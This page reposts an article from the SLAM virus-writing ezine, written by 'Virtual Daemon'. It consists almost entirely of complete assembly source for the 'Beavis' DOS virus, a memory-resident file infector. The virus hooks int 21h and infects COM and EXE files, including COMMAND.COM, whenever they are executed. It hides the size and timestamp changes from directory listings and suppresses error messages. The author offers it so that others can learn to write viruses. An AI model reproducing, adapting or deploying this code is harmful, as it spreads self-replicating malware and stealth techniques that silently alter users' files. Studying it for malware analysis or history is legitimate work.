Copy Link
Add to Bookmark
Report

SLAM3.023: The "Beavis" virus written by Virtual Daemon [SLAM]

eZine's profile picture
Published in 
Slam
 · 26 Feb 2022

The "Beavis" virus
written by Virtual Daemon

Description
Here you have my first COM/EXE TSR virus. I made him quite some time ago, so I think that the elite virus coders wont find anything here...
Sorry guys! :(

Anyway, I'm releasing the source code bcoz this might help somebody out there in learning how to do it. It's quite simple...
About the virus:

  • COM/EXE TSR
  • infection on 4bh (load or execute)
  • size stealth on 11h/12h/4eh/4fh
  • time stealth on 5700h (get file's time/date)
  • int 24h handler (no errors will be displayed)
  • save/restore file time/date/attributes
  • infect COMMAND.COM too

Well, that's all... The virus doesn't have any payload or encryption system bcoz, like I said, this was my first EXE TSR virus! So, don't be too hard on it... There will be a better one! I promise! :-)

code segment 
assume cs:code,ds:code,es:code
org 0
virus_start:
call findoff
findoff:
pop bp
sub bp,offset findoff
push ds ;DS=ES
push es

mov ax,'VD' ;check if the virus is already installed
int 21h
cmp cx,'DV'
je over
mov ah,4ah ;get largest block available
mov bx,0ffffh
int 21h

sub bx,(endheap-virus_start+15)/16+1 ;substract our virus
mov ah,4ah
int 21h
jc over
sub word ptr ds:[2],(endheap-virus_start+15)/16+1

mov ah,48h ;allocate memory
mov bx,(endheap-virus_start+15)/16
int 21h
jc over

push ax
pop es
dec ax
push ax
pop ds

mov al,'Z'
mov byte ptr ds:[0],al ;mark the MCB
mov ax,8
mov word ptr ds:[1],ax

push cs ;CS=DS
pop ds
xor di,di
mov cx,(heap-virus_start)/2+1
mov si,bp
rep movsw ;move the virus to RAM

xor ax,ax
mov ds,ax
push ds
lds ax,ds:[21h*4]
mov word ptr es:oldint21,ax
mov word ptr es:oldint21+2,ds
pop ds
mov word ptr ds:[21h*4],offset int21
mov ds:[21h*4+2],es
over:
pop es
pop ds ;DS=ES

cmp byte ptr cs:[infect_ext+bp],0 ;check if COM or EXE
je restore_EXE
restore_com:
lea si,[bp+offset jumpbuf] ;restore saved bytes
mov di,100h
push di
mov cx,3
repne movsb
retn
jumpbuf db 0cdh,20h,0
restore_exe:
mov ax,es
add ax,10h
add cs:[infcs+bp],ax
cli
mov sp,word ptr cs:[infsp+bp] ;restore sp:ss
add ax,word ptr cs:[infss+bp]
mov ss,ax
sti
xor ax,ax ;clear some registers
xor bx,bx
xor cx,cx
xor dx,dx
xor di,di
xor si,si
push cs:[infcs+bp]
push cs:[infip+bp]
xor bp,bp
retf
infip dw 00000h
infsp dw ?
infss dw ?
infcs dw 0fff0h

int24:
mov al,3
iret
int21:
cmp ax,'VD'
jne yeah
mov cx,'DV'
iret
yeah:
cmp ah,4bh
jne neah
jmp infect
neah:
cmp ah,11h
je stealth1
cmp ah,12h
je stealth1
cmp ah,4eh
je stealth2
cmp ah,4fh
je stealth2
cmp ax,5700h
jne exithandler
jmp stealth3
exithandler:
db 0eah
oldint21 dd ?

stealth1:
pushf
push cs
call exithandler
or al,0
jnz skip_dir
push ax bx es
mov ah,51h ;get the PSP in es:bx
int 21h
mov es,bx
cmp bx,es:[16h] ;check if infected
jnz error
mov bx,dx
mov al,[bx]
push ax
mov ah,2fh ;get DTA area in es:bx
int 21h
pop ax
inc al
jnz no_ext
add bx,7
no_ext:
cmp word ptr es:[bx+1fh],0
jnz error
mov al,es:[bx+17h] ;check in it's one of our files
and al,1fh
xor al,1fh
jnz error
sub word ptr es:[bx+1dh],(heap-virus_start) ;substract our virus
sbb word ptr es:[bx+1fh],0
error:
pop es bx ax
skip_dir:
retf 2

stealth2:
pushf
push cs
call exithandler
jc no_files
pushf
push ax di es bx
mov ah,2fh ;get DTA area in es:bx
int 21h
mov al,es:[bx+16h] ;check if infected with our virus
and al,1fh
xor al,1fh
jnz not_inf
cmp word ptr es:[bx+1ah],(heap-virus_start)
ja hide
cmp word ptr es:[bx+1Ch],0
je not_inf
hide:
sub word ptr es:[bx+1ah],(heap-virus_start) ;substract our virus
sbb word ptr es:[bx+1ch],0
not_inf:
pop bx es di ax
popf
no_files:
retf 2

stealth3:
pushf
call dword ptr cs:[oldint21]
push cx
and cl,01fh ;infected by us?
xor cl,01fh
pop cx
jnz no_way
or cl,01fh ;stealth the time
no_way:
iret
shit:
retf 2

infect:
pushf
push ax bx cx dx si di bp ds es
push ds
push dx

mov ax,3524h ;save old Int 24h
int 21h
mov word ptr cs:[old_int24],bx
mov word ptr cs:[old_int24+2],es

push cs
pop ds
lea dx,int24 ;put a new Int 24h handler
mov ax,2524h
int 21h

pop dx
pop ds
mov ax,4300h ;save attributes
int 21h
push ds
push dx
push cx

mov ax,4301h ;put archive only attributes
xor cx,cx
int 21h

mov ax,3d02h ;open the file for RW
pushf
call dword ptr cs:[oldint21]
xchg ax,bx

mov ax,5700h ;get the time
pushf
call dword ptr cs:[oldint21]
mov word ptr cs:[file_time],cx
mov word ptr cs:[file_date],dx

push cs cs
pop ds es ;CS=DS=ES

mov ah,3fh ;read from file the first 3 bytes
lea dx,header
mov cx,1ch
int 21h

mov byte ptr [infect_ext],1 ;mark as a COM file

mov ax,4202h ;go to EOF
xor cx,cx
cwd
int 21h

mov word ptr file_size,ax ;save file_size
mov word ptr file_size+2,dx

cmp word ptr header,'MZ' ;check if EXE
je infect_exe
cmp word ptr header,'ZM' ;could be inverted... who knows? ;)
je infect_exe
infect_com:
mov ax,word ptr file_size
cmp ax,65535-(endheap-virus_start) ;check if too small
jb go_on
jmp close_file
go_on:
mov cx,word ptr header+1 ;check if already infected
add cx,heap-virus_start+3
cmp ax,cx
jne no_inf
jmp close_file

no_inf:
mov di,offset jumpbuf ;build the new JMP
mov si,offset header
movsb
movsw
mov byte ptr [offset header],0e9h
sub ax,3
mov word ptr [offset header+1],ax
jmp write_virus
infect_exe:
cmp word ptr header+12h,'VD' ;check if already infected
je shake
cmp byte ptr header+18h,'@' ;check if it's a Windows EXE
je shake
cmp word ptr header+1ah,0 ;check if it's a Overlay EXE
jne shake
jmp oks
shake:
jmp close_file
oks:
mov ax,word ptr file_size
mov dx,word ptr file_size+2
push ax
push dx

mov cx,word ptr header+14h ;save IP
mov infip,cx
mov cx,word ptr header+16h ;save CS
mov infcs,cx
mov cx,word ptr header+10h ;save SP
mov infsp,cx
mov cx,word ptr header+0eh ;save SS
mov infss,cx

mov cx,16 ;let's do some calculs
div cx
sub ax,word ptr [header+8h]
mov word ptr [header+14h],dx
mov word ptr [header+16h],ax

add dx,offset endheap
mov word ptr [header+10h],dx
mov word ptr [header+0eh],ax

pop dx
pop ax

add ax,(heap-virus_start)
adc dx,0
mov cx,512 ;recalculate file length
div cx

mov word ptr [header+12h],'VD' ;mark as infected
mov word ptr [header+2],dx
inc ax
mov word ptr [header+4],ax

mov byte ptr [infect_ext],0 ;mark as a EXE infection
write_virus:
mov ah,40h ;write the virus to file
lea dx,virus_start
mov cx,heap-virus_start
int 21h

mov ax,4200h ;go to BOF
xor cx,cx
xor dx,dx
int 21h

cmp infect_ext,1 ;check if COM or EXE
je com_here
mov cx,1ch
jmp short do_it
com_here:
mov cx,3
do_it:
mov ah,40h ;write the new JMP
lea dx,header
int 21h
close_file:
mov ax,5701h
mov cx,word ptr cs:[file_time]
mov dx,word ptr cs:[file_date]
or cl,1fh ;mark for stealth
int 21h

mov ah,3eh ;close the file
int 21h

mov ax,4301h ;restore attributes
pop cx
pop dx
pop ds
int 21h

mov ds,word ptr cs:[old_int24+2]
mov dx,word ptr cs:[old_int24]
mov ax,2524h ;restore the Int 24h handler
int 21h
exit:
pop es ds bp di si dx cx bx ax
popf
jmp exithandler

old_int24 dd ?
virusname db 'Beavis',0
signature db '[VD/SLAM]'
infect_ext db 1
heap:
file_size dd ?
file_time dw ?
file_date dw ?
header db 1ch dup (?)
endheap:
code ends
end virus_start

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT